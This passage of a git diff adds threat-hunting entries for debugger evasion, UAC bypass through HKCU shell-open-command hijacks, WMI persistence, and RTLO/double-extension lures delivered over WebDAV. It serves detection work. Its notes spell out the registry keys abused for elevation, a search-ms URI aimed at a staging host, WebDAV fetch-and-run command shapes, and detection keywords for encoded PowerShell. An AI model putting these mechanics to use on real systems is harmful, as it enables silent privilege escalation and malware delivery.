+Two 2024-2025 Sekoia teardowns — **I2PRAT** ("RATatouille: Cooking Up Chaos in the I2P Kitchen") and **PikaBot** — both gate execution on anti-analysis, using complementary flavors of **T1622 Debugger Evasion**. I2PRAT *self-debugs*: it creates a debug object and attaches to its own freshly spawned child (`NtCreateDebugObject` → `NtDebugActiveProcess`), keeping the child pending so no external debugger can attach. PikaBot *probes*: it reads DR0-DR7 debug registers via `GetThreadContext`, calls `CheckRemoteDebuggerPresent`, uses `ZwSystemDebugControl` via direct syscalls, and enumerates running processes against a debugger/analyst-tool ban list, bailing on a match. HEARTH had no T1622 coverage; this hunt targets both the self-debug pattern and the self-inspection burst.
+
+## Why
+
+- **The check runs before the payload, so catching it interdicts everything downstream.** Both loaders decide whether to detonate based on the anti-debug gate; the injection, C2, and persistence only happen if the gate passes — so the anti-analysis behavior is the earliest reliable catch point.
+- **Self-debugging is anomalous by construction.** A short-lived, unsigned process creating a debug object and attaching to a child it just spawned (with a spoofed `winlogon.exe` parent) is not something benign software does — it is the technique's fingerprint, independent of the C2 or payload.
+- **The banned-process scan is a distinctive tell.** A `CreateToolhelp32Snapshot` walk that matches on `x64dbg`/`windbg`/`procmon`/`wireshark` and is immediately followed by self-termination is a behavioral signature that survives sample changes.
+- **Direct syscalls signal deliberate evasion.** `ZwSystemDebugControl`/`NtSetContextThread` issued via SysWhispers-style direct syscalls (bypassing ntdll hooks) from a non-debugger is itself suspicious and, where ETW-TI is available, directly observable.
+
+## References
+
+- [MITRE ATT&CK T1622: Debugger Evasion](https://attack.mitre.org/techniques/T1622/)
+- [Sekoia TDR: RATatouille — Cooking Up Chaos in the I2P Kitchen (I2PRAT)](https://www.sekoia.com/blog/ratatouille-cooking-up-chaos-in-the-i2p-kitchen)
+- [Sekoia TDR: PikaBot — a Guide to its Deep Secrets and Operations](https://www.sekoia.com/blog/pikabot-a-guide-to-its-deep-secrets-and-operations)
+- [Check Point Anti-Debug Reference: Debug Objects & Debugger Detection](https://anti-debug.checkpoint.com/)
+- [Unprotect Project: Anti-Debugging Techniques](https://unprotect.it/category/anti-debugging/)
+- [MITRE ATT&CK T1497.001: Virtualization/Sandbox Evasion — System Checks](https://attack.mitre.org/techniques/T1497/001/)

--- a/Flames/H243.md
+++ b/Flames/H243.md
@@ -1,0 +1,93 @@
+---
+id: H243
+category: Flames
+title: UAC bypass via auto-elevating binary and HKCU shell-open-command hijack (fodhelper / computerdefaults / wsreset)
+hypothesis: >-
+  An operator running at medium integrity elevates without a UAC prompt by hijacking a per-user handler an
+  auto-elevating Microsoft binary trusts: it writes a payload command to HKCU\Software\Classes\ms-settings\Shell\
+  Open\command (plus a DelegateExecute value), or the mscfile / Folder\shell\open\command variants, then launches
+  fodhelper.exe / computerdefaults.exe / eventvwr.exe / sdclt.exe / wsreset.exe — which auto-elevates to high
+  integrity and runs the hijacked command as the elevated child. Hunt on Windows for the HKCU shell-open-command
+  write (Sysmon 13) closely followed by an auto-elevating binary spawning a shell/interpreter (Sysmon 1 / 4688),
+  and for COM auto-elevation via an anomalous dllhost.exe child.
+tactics:
+  - Privilege Escalation
+  - Defense Evasion
+techniques:
+  - T1548.002
+tags:
+  - privilege_escalation
+  - defense_evasion
+  - windows
+  - uac_bypass
+  - fodhelper
+  - computerdefaults
+  - registry_hijack
+  - purerat
+  - t1548_002
+  - t1112
+submitter:
+  name: Lauren Proehl
+  link: https://x.com/jotunvillur
+required_data_sources:
+  - Sysmon Event ID 13 (RegistryEvent — value set) on HKCU\Software\Classes\...\shell\open\command and DelegateExecute
+  - Sysmon Event ID 1 (Process Create) / Windows Security 4688 with integrity level and parent/child image
+  - Sysmon Event ID 12/14 (registry key create/rename) — SymbolicLinkValue evasion of the registry footprint
+  - Process token integrity level (Medium→High transition without a consent.exe prompt)
+false_positive_notes: |
+  fodhelper.exe, computerdefaults.exe, eventvwr.exe, sdclt.exe, and wsreset.exe run legitimately when a user opens
+  the corresponding Settings/utility, but they should NEVER spawn cmd.exe/powershell.exe/mshta.exe or an unknown
+  binary, and the HKCU\Software\Classes\...\shell\open\command key should not be written by a medium-integrity
+  process moments before one of them launches. Separate on (a) the registry write to the ms-settings/mscfile/Folder
+  shell-open-command family, especially with a DelegateExecute value, and (b) the auto-elevating binary's child
+  being an interpreter or a path under %TEMP%/%APPDATA%. Legitimate elevation shows a consent.exe UAC prompt; the
+  bypass does not. Allowlist any in-house tooling that intentionally uses these keys before alerting.
+notes: |
+  PLATFORM: Windows. SOURCE: Rapid7, "From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery
+  Lab" (2026-07-20). The recovered kit's Tier-5 test set included `I49_fodhelper.url`, `I50_computerdefaults.url`,
+  and `I52_wsreset.url`, and the DlrtyGames chain performed COM auto-elevation through dllhost.exe; the final
+  payload was PureRAT 4.4.3. HEARTH had no T1548.002 coverage.
+
+  ATTACK MECHANICS: UAC bypass here is logic abuse, not memory corruption. Auto-elevating Microsoft binaries
+  (marked autoElevate=true) launch to high integrity without a prompt and then open a handler resolved via the
+  registry. fodhelper/computerdefaults look up `HKCU\Software\Classes\ms-settings\Shell\Open\command`; because HKCU
+  is checked before HKCR and is user-writable, a medium-integrity process pre-populates that key (often with a
+  `DelegateExecute` value) so the elevated binary runs the attacker's command as high integrity. Sibling keys:
+  `HKCU\Software\Classes\mscfile\shell\open\command` (eventvwr), `HKCU\Software\Classes\Folder\shell\open\command`
+  and `exefile\shell\runas\command\IsolatedCommand` (sdclt), `HKCU\Environment` windir hijack (SilentCleanup).
+
+  DETECTION SIGNALS (Windows):
+  - Sysmon EID 13: value set on `HKCU\Software\Classes\{ms-settings|mscfile|Folder}\...\shell\open\command` or a
+    `DelegateExecute` value — capture in real time, since operators often delete the key immediately after (a
+    point-in-time registry scan misses it). SwiftOnSecurity Sysmon config covers these paths by default.
+  - Sysmon EID 1 / 4688: fodhelper.exe / computerdefaults.exe / eventvwr.exe / sdclt.exe / wsreset.exe (or
+    dllhost.exe COM surrogate) spawning cmd/powershell/mshta/rundll32 or an unsigned binary — a Medium→High
+    integrity transition with NO preceding consent.exe. "A legitimate fodhelper.exe should never spawn a shell."
+  - Correlation rule: any HKCU\Software\Classes\...\command write within ~5 min BEFORE an auto-elevating binary
+    launches. Then trace the high-integrity session for LSASS access, service install (7045), or encoded PowerShell.
+  - Evasion watch: Sysmon EID 12/14 registry symbolic-link creation with value name `SymbolicLinkValue` (UACME
+    >=3.5 uses a symlink+rename to dodge shell-open-command monitoring).
+
+  CROSS-REF: T1112 (Modify Registry — the HKCU hijack is the registry-write half); T1055 (the PureRAT payload this
+  bypass elevates then injects); the same Rapid7 lab drives H240 (T1036.007 delivery) and H241/B032 (WMI
+  persistence) — different stages of one intrusion.
+---
+# H243
+
+Rapid7's exposed WebDAV delivery lab (2026-07-20) shipped a Tier-5 UAC-bypass test set — `I49_fodhelper.url`, `I50_computerdefaults.url`, `I52_wsreset.url` — plus a COM auto-elevation path through `dllhost.exe`, all elevating a PureRAT payload. **T1548.002** is logic abuse: a medium-integrity process writes a payload command to a per-user handler (`HKCU\Software\Classes\ms-settings\Shell\Open\command` + `DelegateExecute`) that an auto-elevating Microsoft binary trusts, then launches `fodhelper.exe`/`computerdefaults.exe`, which elevates to high integrity and runs the hijacked command — no UAC prompt. HEARTH had no T1548.002 coverage; this hunt targets the registry-hijack write and the anomalous auto-elevated child.
+
+## Why
+
+- **The footprint is narrow and well-known — that's the defender's edge.** The technique reduces to one registry-key family plus an auto-elevating binary spawning an unexpected child, so a tight rule catches the whole UACME family without drowning in noise.
+- **Registry writes must be caught in flight.** Operators frequently delete the `shell\open\command` key right after elevation, so real-time Sysmon EID 13 capture — not a point-in-time scan — is what preserves the payload-bearing evidence.
+- **Process lineage is a hard behavioral invariant.** `fodhelper.exe` or `computerdefaults.exe` never legitimately spawns `cmd`/`powershell`; a Medium→High integrity jump with no preceding `consent.exe` prompt is a structural anomaly that survives payload changes.
+- **It gates the expensive post-exploitation.** UAC bypass is the doorway to credential dumping, service install, and tamper of security tools; catching the elevation denies the operator high-integrity actions before they start.
+
+## References
+
+- [MITRE ATT&CK T1548.002: Abuse Elevation Control Mechanism — Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)
+- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)
+- [Elastic Security Labs: Exploring Windows UAC Bypasses — Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies)
+- [Splunk Security Content: FodHelper UAC Bypass](https://research.splunk.com/endpoint/909f8fd8-7ac8-11eb-a1f3-acde48001122/)
+- [Atomic Red Team: T1548.002 — Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md)
+- [hfiref0x/UACME: Defeating Windows User Account Control (technique catalogue)](https://github.com/hfiref0x/UACME)

--- a/Flames/H244.md
+++ b/Flames/H244.md
@@ -1,5 +1,5 @@
 ---
-id: H240
+id: H244
 category: Flames
 title: Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms
 hypothesis: >-
@@ -72,7 +72,7 @@ notes: |
   360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the
   post-execution stages of the same intrusion set.
 ---
-# H240
+# H244
 
 Rapid7's teardown of an exposed WebDAV malware-delivery lab (2026-07-20) recovered thousands of bulk-generated lure files and the operators' own QA notes. The kit's core evasion is filename masquerading: a `search-ms` URI transparently opens a remote WebDAV share filtered to a single extension, and the payload's real `.lnk`/`.scr`/`.exe` extension is buried behind a spoofed `.pdf` built from a **double extension**, an **RTL-Override (U+202E)** character, homoglyphs, and whitespace padding (e.g. `ReportFinal.rcs.pdf`). HEARTH had no coverage for **T1036.007 Double File Extension**; this hunt targets both the on-disk filename artifact and the WebDAV-delivery process/network tell that carries it.
 

--- a/hunts-data.js
+++ b/hunts-data.js
@@ -951,6 +951,40 @@ const HUNTS_DATA = [
     "created": "2026-07-18T14:13:05-05:00"
   },
   {
+    "id": "B032",
+    "category": "Embers",
+    "title": "Baseline all permanent WMI event subscriptions to surface rogue CommandLine/ActiveScript consumers",
+    "tactic": "Persistence, Privilege Escalation",
+    "notes": "PLATFORM: Windows. BASELINE FIRST (Embers). TRIGGER SOURCE: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab\" (2026-07-20), which listed WMI event subscription as a persistence mechanism in the delivery kit. This baseline is the prerequisite that makes the paired Flame (H241, T1546.003) able to call a subscription \"unexpected.\"\n\nDATA COLLECTION FIELDS (per subscription object): hostname; __EventFilter name + WQL query text (trigger class, e.g. Win32_PerfFormattedData uptime / __InstanceModificationEvent logon / timer); consumer type (CommandLineEventConsumer vs ActiveScriptEventConsumer vs the benign LogFile/NTEventLog types); consumer name; consumer ACTION (CommandLineTemplate / ExecutablePath, or ScriptText/ScriptingEngine); __FilterToConsumerBinding linkage; creating process image + signer + user (from Sysmon EID 1 near the EID 19/20/21 timestamps); creation timestamp; SYSTEM vs user context. TELEMETRY: Sysmon EID 19/20/21, WMI-Activity operational log EIDs 5859-5861, and host inventory via osquery (wmi_event_filters, wmi_consumers, wmi_filter_consumer_bindings) or Get-WmiObject -Namespace root\\subscription.\n\nCOLLECTION WINDOW: 30 days to capture reboot/logon/patch-cycle triggers, plus a one-time full repository sweep of all existing subscriptions (persistence may predate the collection window). DELIVERABLE: a per-environment allowlist of vetted subscriptions keyed on {consumer type, normalized consumer action, creating signer}, plus an inventory of every host carrying a CommandLine/ActiveScript consumer — the triage worklist.\n\nIMMEDIATE FLAGS (do not wait for the baseline to finish): (1) a CommandLineEventConsumer whose action runs powershell/cmd/mshta/wscript/cscript/rundll32, contains `-enc`/`-EncodedCommand`/`DownloadString`/`IEX`, or points at %TEMP%/%APPDATA%/ProgramData or another user-writable path; (2) an ActiveScriptEventConsumer with embedded VBScript/JScript; (3) filter + consumer + binding (EID 19+20+21) all created within the same second by a non-management process; (4) any consumer created by an unsigned or first-seen creator process. CROSS-REF: enables H241 (T1546.003 WMI subscription persistence executing an interpreter/LOLBin); relates to T1047 (WMI) and T1059.001/.005 (the PowerShell/VBScript a malicious consumer runs).",
+    "tags": [
+      "persistence",
+      "privilege_escalation",
+      "windows",
+      "wmi",
+      "event_subscription",
+      "baseline",
+      "fileless",
+      "commandlineeventconsumer",
+      "t1546_003",
+      "t1047",
+      "T1546.003"
+    ],
+    "techniques": [
+      "T1546.003"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **Malicious WMI persistence hides among legitimate management subscriptions, not among noise.** The few products that create permanent subscriptions look structurally similar to an attacker's, so only a vetted allowlist of *which* consumers legitimately exist — keyed on the consumer action and its creating signer — makes a rogue one stand out. That is why this is an Ember, not a Flame.\n- **The repository must be swept, not just watched.** Persistence installed before monitoring began lives silently in the CIM database with no ongoing event; a one-time enumeration of `root\\subscription` across the estate is the only way to find pre-existing implants, which a purely streaming rule never sees.\n- **The volume is low enough to inventory completely.** Permanent subscriptions are rare, so unlike most baselines this one can aim for full coverage — every filter, consumer, and binding — turning the baseline itself into a durable asset inventory.\n- **It is the prerequisite for the persistence Flame.** H241 can only call a consumer \"unexpected\" against this allowlist; without the baseline, every SCCM or monitoring subscription is a false positive and the Flame is unusable.",
+    "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [in.security: An Intro into Abusing and Identifying WMI Event Subscriptions for Persistence](https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/)\n- [osquery schema: wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings](https://osquery.io/schema/current)\n- [Splunk Security Content: WMI Permanent Event Subscription — Sysmon](https://research.splunk.com/endpoint/ad05aae6-3b2a-4f73-af97-57bd26cee3b9/)",
+    "file_path": "Embers/B032.md",
+    "created": null
+  },
+  {
     "id": "H001",
     "category": "Flames",
     "title": "An adversary is attempting to brute force the admin account on the externally facing VPN gateway.",
@@ -8165,6 +8199,144 @@ const HUNTS_DATA = [
     "created": "2026-07-24T22:31:35-04:00"
   },
   {
+    "id": "H240",
+    "category": "Flames",
+    "title": "Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms",
+    "tactic": "Defense Evasion",
+    "notes": "PLATFORM: Windows. Source: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery\nLab\" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in\nboth observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).\n\nATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single\nextension — e.g. `search-ms:displayname=Search Results in \\\\onedrive.cv@80\\Downloads\\CURP&query=*.scr` — so the\nvictim sees what looks like a local search result. The lures follow a systematic naming scheme\n`HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an\nRTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double\nextensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,\nlibrary-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph\n  characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.\n- WebClient service starting (svchost -k WebClientGroup / System 7036 \"WebClient → Running\") on a host that does\n  not normally mount WebDAV, immediately followed by:\n- Sysmon EID 1: `rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`\n  (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.\n- Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\\\<host>@SSL\\DavWWWRoot\\new.bat`, or a\n  decoy .pdf opened from the same DavWWWRoot path while the real payload executes.\n- Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\\\<host>@<port>\\DavWWWRoot\\files`.\n\nCROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious\nFile — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo\n360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the\npost-execution stages of the same intrusion set.\n",
+    "tags": [
+      "defense_evasion",
+      "windows",
+      "masquerading",
+      "double_extension",
+      "rtlo",
+      "webdav",
+      "search_ms",
+      "initial_access",
+      "purerat",
+      "t1036_007",
+      "t1036_002",
+      "t1204_002",
+      "T1036.007"
+    ],
+    "techniques": [
+      "T1036.007"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.\n- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.\n- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.\n- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.",
+    "references": "- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)\n- [dfir.ch: Abusing the \"search-ms\" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)\n- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)\n- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)\n- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)",
+    "file_path": "Flames/H240.md",
+    "created": null
+  },
+  {
+    "id": "H241",
+    "category": "Flames",
+    "title": "WMI permanent event subscription persistence executing a script interpreter or LOLBin",
+    "tactic": "Persistence, Privilege Escalation",
+    "notes": "PLATFORM: Windows. TRIGGER SOURCE: Rapid7, \"From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware\nDelivery Lab\" (2026-07-20), which flagged WMI event subscription as a persistence mechanism in the delivery kit\n(alongside scheduled tasks `brokerhost`/`net_queue_32` and a Run key). HEARTH had no coverage for T1546.003; this\nhunt generalizes the technique with the well-established WMI persistence detection stack.\n\nATTACK MECHANICS: persistence lives in the WMI/CIM repository, not on disk. Three objects are required and Sysmon\nlogs each: __EventFilter (EID 19 — inspect the WQL, e.g. a trigger on `Win32_PerfFormattedData_PerfOS_System`\nuptime 200-320s or on logon), an EventConsumer (EID 20 — the two abused types are CommandLineEventConsumer, which\nruns a command, and ActiveScriptEventConsumer, which runs embedded VBScript/JScript), and a\n__FilterToConsumerBinding (EID 21). Execution is brokered by trusted WmiPrvSE.exe (and scrcons.exe for script\nconsumers), typically inheriting SYSTEM.\n\nDETECTION SIGNALS (Windows):\n- Temporal correlation: Sysmon EID 19 + 20 + 21 created within the same second/minute = a subscription deployed.\n- EID 20 CommandLineEventConsumer/ActiveScriptEventConsumer whose action contains powershell/cmd/mshta/wscript,\n  `-enc`/`-EncodedCommand`, DownloadString/IEX, or a path under %TEMP%/%APPDATA%/ProgramData.\n- WMI-Activity operational log EIDs 5859-5861 as a corroborating/second source where Sysmon isn't deployed.\n- Sysmon EID 7: WmiPrvSE.exe loading wbemcons.dll (CommandLineEventConsumer runtime), or EID 1: scrcons.exe /\n  WmiPrvSE.exe spawning an interpreter under SYSTEM with an anomalous parent.\n- Host inventory via osquery tables wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings.\n\nCROSS-REF: pair with B032 (baseline of legitimate permanent WMI subscriptions) — you cannot call a consumer\n\"unexpected\" without that allowlist, so B032 is the prerequisite for this Flame. Also cross-ref T1047 (WMI) for\nthe broader abuse of the WMI service, and T1059.001/.005 for the PowerShell/VBScript the consumer executes.\n",
+    "tags": [
+      "persistence",
+      "privilege_escalation",
+      "windows",
+      "wmi",
+      "event_subscription",
+      "fileless",
+      "commandlineeventconsumer",
+      "activescripteventconsumer",
+      "t1546_003",
+      "t1047",
+      "T1546.003"
+    ],
+    "techniques": [
+      "T1546.003"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **Fileless and SYSTEM-context by design.** The persistence lives in the CIM repository, not the filesystem, and executes through a trusted broker, so disk-based and signature detections miss it — creation telemetry (Sysmon 19/20/21) is the reliable catch point.\n- **The telemetry is nearly noise-free.** Permanent WMI subscriptions are rare outside a handful of management tools, so a log-all approach with a small allowlist yields high-fidelity alerts rather than a flood.\n- **Temporal correlation is a strong, durable signal.** Filter + consumer + binding created within the same second is a structural fingerprint of the technique that survives payload and infrastructure changes.\n- **It pairs with a concrete baseline.** The one false-positive source — legitimate management subscriptions — is exactly what B032 inventories, so the two hunts together turn \"any subscription\" into \"any subscription not on the allowlist.\"",
+    "references": "- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)\n- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)\n- [SigmaHQ: WMI Event Subscription (sysmon_wmi_event_subscription.yml)](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml)\n- [Splunk Security Content: Detect WMI Event Subscription Persistence](https://research.splunk.com/endpoint/01d9a0c2-cece-11eb-ab46-acde48001122/)\n- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)\n- [Detect.FYI: Hunting WMI Event Subscription Persistence](https://detect.fyi/hunting-wmi-event-subscription-persistence-f087900029f4)",
+    "file_path": "Flames/H241.md",
+    "created": null
+  },
+  {
+    "id": "H242",
+    "category": "Flames",
+    "title": "Malware self-debugging and debug-register / debugger-process checks to block analysis (I2PRAT, PikaBot)",
+    "tactic": "Defense Evasion",
+    "notes": "PLATFORM: Windows. Sources: Sekoia TDR, \"RATatouille: Cooking Up Chaos in the I2P Kitchen\" (I2PRAT) and Sekoia\nTDR, \"PikaBot: a Guide to its Deep Secrets and Operations.\" Both malware families gate execution on\nanti-analysis, and both surfaced T1622 as an uncovered gap.\n\nATTACK MECHANICS — two complementary approaches observed:\n1. I2PRAT self-debugging: the loader creates a debug object and attaches to its own newly spawned installer\n   process so a debugger cannot attach, using NtCreateDebugObject, NtDebugActiveProcess, NtWaitForDebugEvent,\n   NtDebugContinue, and waiting on DbgCreateProcessStateChange to keep the child pending. It also duplicates an\n   elevated SYSTEM process handle (NtDuplicateObject, PROCESS_ALL_ACCESS) and spawns a child with\n   PROCESS_CREATE_FLAGS_INHERIT_HANDLES, spoofing the parent PID as a child of winlogon.exe, then injects via\n   thread execution hijacking (observed \"duplicates itself from process ID 6028 to 8912\").\n2. PikaBot active checks: reads debug registers through the thread context via GetThreadContext (\"non-zero values\n   in any of these registers may indicate a debugger\"), carries CheckRemoteDebuggerPresent and a debug_flag in\n   its stage-2 struct, and enumerates processes with CreateToolhelp32Snapshot / Process32First / Process32Next\n   against an RC4-encrypted ban list (x32dbg.exe, x64dbg.exe, windbg.exe, ImmunityDebugger.exe, idaq/idaq64.exe,\n   Fiddler.exe, \"Wireswhar.exe\", dumpcap.exe, ProcessHacker.exe, procmon.exe, tcpview.exe, cheatengine variants),\n   terminating on a match. Since Feb 2024 it uses direct syscalls (SysWhispers2) including ZwSystemDebugControl /\n   NtSystemDebugControl to bypass ntdll userland hooks. (Related: Rapid7's PureRAT WebDAV payload calls\n   IsDebuggerPresent and FailFast if monitored, and checks COR_PROFILER — the same defensive gate.)\n\nDETECTION SIGNALS (Windows):\n- Sysmon EID 10 (ProcessAccess): SourceImage (unsigned/new) opening a TargetImage it just created with access\n  masks granting debug/duplicate rights; or self-open. GrantedAccess like 0x1FFFFF (PROCESS_ALL_ACCESS).\n- Sysmon EID 1: a child created SUSPENDED whose ParentImage is spoofed (winlogon.exe) but whose real creator is a\n  loader in %TEMP%/%APPDATA%; correlate CreationTime vs the debug-object access.\n- ETW-TI (if surfaced by the EDR): NtCreateDebugObject/NtDebugActiveProcess against an own child, NtSetContextThread\n  + NtResumeThread (thread hijack), ZwSystemDebugControl from a non-debugger.\n- Behavioral bundle: banned-analyst-process enumeration (Toolhelp snapshot) immediately followed by self-exit, or\n  debug checks immediately followed by CreateRemoteThread/process tampering (EID 8/25).\n\nCROSS-REF: T1497.001 (System Checks — the banned-process/sandbox enumeration is the sibling anti-analysis gate);\nT1055.003/.012 (thread execution hijacking / process hollowing that these loaders run once the anti-debug gate\npasses); T1106 (Native API — the Nt*/Zw* direct-syscall usage that carries the checks).\n",
+    "tags": [
+      "defense_evasion",
+      "windows",
+      "debugger_evasion",
+      "anti_analysis",
+      "anti_debugging",
+      "i2prat",
+      "pikabot",
+      "process_injection",
+      "t1622",
+      "t1497_001",
+      "T1622"
+    ],
+    "techniques": [
+      "T1622"
+    ],
+    "severity": null,
+    "status": "current",
+    "related_hunt_ids": [],
+    "submitter": {
+      "name": "Lauren Proehl",
+      "link": "https://x.com/jotunvillur"
+    },
+    "why": "- **The check runs before the payload, so catching it interdicts everything downstream.** Both loaders decide whether to detonate based on the anti-debug gate; the injection, C2, and persistence only happen if the gate passes — so the anti-analysis behavior is the earliest reliable catch point.\n- **Self-debugging is anomalous by construction.** A short-lived, unsigned process creating a debug object and attaching to a child it just spawned (with a spoofed `winlogon.exe` parent) is not something benign software does — it is the technique's fingerprint, independent of the C2 or payload.\n- **The banned-process scan is a distinctive tell.** A `CreateToolhelp32Snapshot` walk that matches on `x64dbg`/`windbg`/`procmon`/`wireshark` and is immediately followed by self-termination is a behavioral signature that survives sample changes.\n- **Direct syscalls signal deliberate evasion.** `ZwSystemDebugControl`/`NtSetContextThread` issued via SysWhispers-style direct syscalls (bypassing ntdll hooks) from a non-debugger is itself suspicious and, where ETW-TI is available, directly observable.",
+    "references": "- [MITRE ATT&CK T1622: Debugger Evasion](https://attack.mitre.org/techniques/T1622/)\n- [Sekoia TDR: RATatouille — Cooking Up Chaos in the I2P Kitchen (I2PRAT)](https://www.sekoia.com/blog/ratatouille-cooking-up-chaos-in-the-i2p-kitchen)\n- [Sekoia TDR: PikaBot — a Guide to its Deep Secrets and Operations](https://www.sekoia.com/blog/pikabot-a-guide-to-its-deep-secrets-and-operations)\n- [Check Point Anti-Debug Reference: Debug Objects & Debugger Detection](https://anti-debug.checkpoint.com/)\n- [Unprotect Project: Anti-Debugging Techniques](https://unprotect.it/category/anti-debugging/)\n- [MITRE ATT&CK T1497.001: Virtualization/Sandbox Evasion — System Checks](https://attack.mitre.org/techniques/T1497/001/)",
+    "file_path": "Flames/H242.md",
+    "created": null
+  },
+  {
+    "id": "H243",
+    "category": "Flames",
+    "title": "UAC bypass via auto-elevating binary and HKCU shell-open-command hijack (fodhelper / computerdefaults / wsreset)",
+    "tactic": "Privilege Escalation, Defense Evasion",
